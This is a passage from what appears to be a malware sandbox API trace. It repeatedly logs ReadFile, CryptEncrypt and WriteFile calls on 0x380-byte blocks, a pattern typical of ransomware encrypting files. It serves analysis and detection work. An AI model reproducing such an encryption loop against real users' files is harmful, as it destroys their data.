lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.587] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.587] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.587] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.587] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.587] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.587] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.587] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.587] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.587] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.587] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.588] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.588] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.588] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.588] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.588] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.588] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.588] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.588] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.588] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.588] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.588] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.588] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.588] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.589] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.589] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.589] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.589] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.589] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.589] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.589] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.589] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.589] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.589] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.589] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.589] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.589] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.590] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.590] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.590] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.590] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.590] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.590] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.590] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.590] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.590] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.590] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.590] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.590] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.590] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.590] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.590] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.591] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.591] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.591] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.591] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.591] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.591] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.591] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.591] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.591] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.591] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.591] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.591] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.592] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.592] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.592] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.592] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.592] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.592] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.592] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.592] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.592] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.593] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.593] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.593] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.593] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.593] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.593] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.593] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.593] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.593] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.593] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.593] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.593] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.594] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.594] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.594] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.594] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, 